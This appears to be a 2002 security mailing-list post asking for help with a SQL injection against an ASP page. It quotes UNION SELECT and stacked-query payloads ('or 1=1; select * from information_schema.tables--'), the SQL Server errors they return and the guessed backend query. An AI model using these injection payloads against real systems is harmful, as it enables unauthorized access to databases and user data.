Hi,
Instead of the usual 80040e07 regarding syntax error, I get the following:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
incompatible with int
I have tried
union select username,1,1,.... (20+ columns) from table
union select 1,username,1,1....
union select 1,1,username,1...
but they still give me the same errors. Is there any way to create the
query so that it will return the correct information?
I've also tried
union select convert(sql_variant,username),1,1,...
but it produced the same result as well.
My second problem is that I cannot execute this:
http://target/da.asp?userid=user' or 1=1; select * from information_schema.tables--
I get
Error Type:
ADODB.Recordset (0x800A0CB3)
Current Recordset does not support bookmarks. This may be a limitation of the
provider or of the selected cursortype.
Does this mean that the query has been passed to the SQL server, but it does
not know how to return the results? What can I do to execute the queries
successfully?
>From other error messages that I got, the query is something like this:
SELECT username FROM table_name WHERE userid like %input% ORDER BY
username ASC.
Any help is greatly appreciated.
--mel
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Mar 15 2002
Intro
